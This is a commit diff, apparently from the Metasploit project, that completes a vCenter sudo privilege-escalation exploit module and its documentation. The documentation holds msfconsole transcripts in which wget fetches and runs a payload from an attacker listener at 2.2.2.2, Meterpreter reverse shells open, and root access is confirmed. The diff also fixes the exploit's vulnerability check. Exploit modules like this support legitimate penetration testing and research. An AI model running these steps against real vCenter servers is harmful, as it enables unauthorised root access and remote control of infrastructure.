vcenter sudo module

rapid7 · Nov 21, 2024 · 0f6da56 · 0f6da56
1 parent 6bd049e
commit 0f6da56
Show file tree

Hide file tree

Showing 3 changed files with 69 additions and 30 deletions.
diff --git a/documentation/modules/exploit/linux/local/vcenter_sudo_lpe.md b/documentation/modules/exploit/linux/local/vcenter_sudo_lpe.md
@@ -1,27 +1,27 @@
 ## Vulnerable Application
 
-Instructions to get the vulnerable application. If applicable, include links to the vulnerable install
-files, as well as instructions on installing/configuring the environment if it is different than a
-standard install. Much of this will come from the PR, and can be copy/pasted.
+VMware vCenter Server < 7.0.3 update R and < 8.0.2 update D
+contains multiple local privilege escalation vulnerabilities
+due to misconfiguration of sudo. An authenticated local user
+with non-administrative privileges may exploit these issues
+to elevate privileges to root on vCenter Server Appliance.
+
+Tested against VMware vCenter Server Appliance 8.0.0.10000 20519528
 
 ## Verification Steps
-Example steps in this format (is also in the PR):
 
 1. Install the application
-1. Start msfconsole
-1. Do: `use [module path]`
-1. Do: `run`
-1. You should get a shell.
+2. Start msfconsole
+3. Get an initial user level shell
+4. Do: `use exploit/linux/local/vcenter_sudo_lpe`
+5. Do: `set lhost <lhost>`
+6. Do: `set sessoin <session>`
+7. Do: `run`
+8. You should get a root shell.
 
 ## Options
-List each option and how to use it.
-
-### Option Name
-
-Talk about what it does, and how to use it appropriately. If the default value is likely to change, include the default value here.
 
 ## Scenarios
-Specific demo of using the module that might be useful in a real world scenario.
 
 ### VMware vCenter Server Appliance 8.0.0.10000 (VMware-VCSA-all-8.0.0-20519528.iso)
 
@@ -85,7 +85,7 @@ pod@localhost [ /tmp ]$ wget -qO smswhnVK --no-check-certificate http://2.2.2.2:
 [1] 22325
 ```
 
-Priv Esc
+Priv Esc. Autocheck disabled due to an incomplete install.
 
 ```
 [msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > sessions -i 1
@@ -182,7 +182,7 @@ wget -qO JSlY5cPV --no-check-certificate http://2.2.2.2:8181/eEgibKL2K; chmod +x
 [*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:56166) at 2024-11-18 16:27:17 -0500
 ```
 
-Priv Esc
+Priv Esc. Autocheck disabled due to an incomplete install.
 
 ```
 [msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) > use exploit/linux/local/vcenter_sudo_lpe
@@ -230,9 +230,9 @@ If the user `admin` exists, use that. If not, follow the bellow instructions
 Make a user in the operator group:
 
 ```
-sudo useradd -m -s /bin/bash admin
-sudo usermod -aG admin admin
-sudo usermod -aG users admin
+useradd -m -s /bin/bash admin
+usermod -aG admin admin
+usermod -aG users admin
 ```
 
 Start our first handler
@@ -263,7 +263,45 @@ wget -qO IsMq60f5 --no-check-certificate http://2.2.2.2:8181/Hul7qG; chmod +x Is
 Priv Esc
 
 ```
-```
+[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > use exploit/linux/local/vcenter_sudo_lpe
+[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
+[msf](Jobs:1 Agents:1) exploit(linux/local/vcenter_sudo_lpe) > set lhost 2.2.2.2
+lhost => 2.2.2.2
+[msf](Jobs:1 Agents:1) exploit(linux/local/vcenter_sudo_lpe) > set lport 9870
+lport => 9870
+[msf](Jobs:1 Agents:1) exploit(linux/local/vcenter_sudo_lpe) > set verbose true
+verbose => true
+[msf](Jobs:1 Agents:1) exploit(linux/local/vcenter_sudo_lpe) > set autocheck false
+autocheck => false
+[msf](Jobs:1 Agents:1) exploit(linux/local/vcenter_sudo_lpe) > set session 1
+session => 1
+[msf](Jobs:1 Agents:1) exploit(linux/local/vcenter_sudo_lpe) > run
 
+[*] Started reverse TCP handler on 2.2.2.2:9870 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] Exploitable version detected: 8.0.0.20519528
+[+] User is vulnerable
+[+] The target appears to be vulnerable. Version 8.0.0.20519528 and user (admin:["users", "admin"]) are vulnerable
+[*] Utilizing VMWARE_PYTHON_BIN exploitation method for admin group.
+[*] Creating directory /tmp/appliance
+[*] /tmp/appliance created
+[*] Writing '/tmp/appliance/NKdii1ux' (250 bytes) ...
+[*] Launching exploit...
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 1.1.1.1
+[+] Deleted /tmp/appliance/NKdii1ux
+[+] Deleted /tmp/appliance/__init__.py
+[+] Deleted /tmp/appliance
+[*] Meterpreter session 2 opened (2.2.2.2:9870 -> 1.1.1.1:58686) at 2024-11-21 04:00:08 -0500
 
-XXX to be completed
+(Meterpreter 2)(/tmp) > getuid
+Server username: root
+(Meterpreter 2)(/tmp) > background
+[*] Backgrounding session 2...
+s[msf](Jobs:1 Agents:2) exploit(linux/local/vcenter_sudo_lpe) > sessions -i 1
+[*] Starting interaction with 1...
+
+(Meterpreter 1)(/tmp) > getuid
+Server username: admin
+(Meterpreter 1)(/tmp) > 
+```
diff --git a/lib/msf/core/post/vcenter/vcenter.rb b/lib/msf/core/post/vcenter/vcenter.rb
@@ -118,13 +118,15 @@ def validate_pkey(private_key)
 
         #
         # It returns the vcenter product banner and build number
+        # Cross reference https://knowledge.broadcom.com/external/article/326316/build-numbers-and-versions-of-vmware-vce.html
         # @return [String] of vcenter product banner and build number
         #
         def get_vcenter_build
           if command_exists?(vpxd_bin)
             return cmd_exec("#{vpxd_bin} -v").split("\n").last.strip
           end
 
+          # this file may not be getting updated any longer. On vCenter 8.0.0.10000 it reads 6.5.0.0 Build 16197320
           if file_exist?(manifest_file)
             xml = read_file(manifest_file)
             xmldoc = Nokogiri::XML(xml) do |config|

diff --git a/modules/exploits/linux/local/vcenter_sudo_lpe.rb b/modules/exploits/linux/local/vcenter_sudo_lpe.rb
@@ -24,6 +24,8 @@ def initialize(info = {})
           due to misconfiguration of sudo. An authenticated local user
           with non-administrative privileges may exploit these issues
           to elevate privileges to root on vCenter Server Appliance.
+
+          Tested against VMware vCenter Server Appliance 8.0.0.10000 20519528
         },
         'License' => MSF_LICENSE,
         'Author' => [
@@ -44,21 +46,18 @@ def initialize(info = {})
         ],
         'DisclosureDate' => '2024-06-18',
         'DefaultTarget' => 0,
-        # https://docs.metasploit.com/docs/development/developing-modules/module-metadata/definition-of-module-reliability-side-effects-and-stability.html
         'Notes' => {
-          'Stability' => [],
-          'Reliability' => [],
-          'SideEffects' => []
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK]
         }
       )
     )
-    # force exploit is used to bypass the check command results
     register_advanced_options [
       OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
     ]
   end
 
-  # Simplify pulling the writable directory variable
   def base_dir
     datastore['WritableDir'].to_s
   end
@@ -80,13 +79,13 @@ def check
 
     @user = cmd_exec('whoami').chomp
     @groups = cmd_exec('groups').chomp.split(' ')
-    if ['infraprofile', 'vpxd', 'sts', 'pod'].contains?(user) || (['operator', 'admin'] & group).any?
+    if ['infraprofile', 'vpxd', 'sts', 'pod'].include?(@user) || (['operator', 'admin'] & @groups).any?
       vprint_good('User is vulnerable')
     else
-      return CheckCode::Safe("User not vulnerable or not in correct group. (#{user}:#{groups})")
+      return CheckCode::Safe("User not vulnerable or not in correct group. (#{@user}:#{@groups})")
     end
 
-    CheckCode::Appears('System seems exploitable')
+    CheckCode::Appears("Version #{vbuild_version} and user (#{@user}:#{@groups}) are vulnerable")
   end
 
   def exploit_operator_group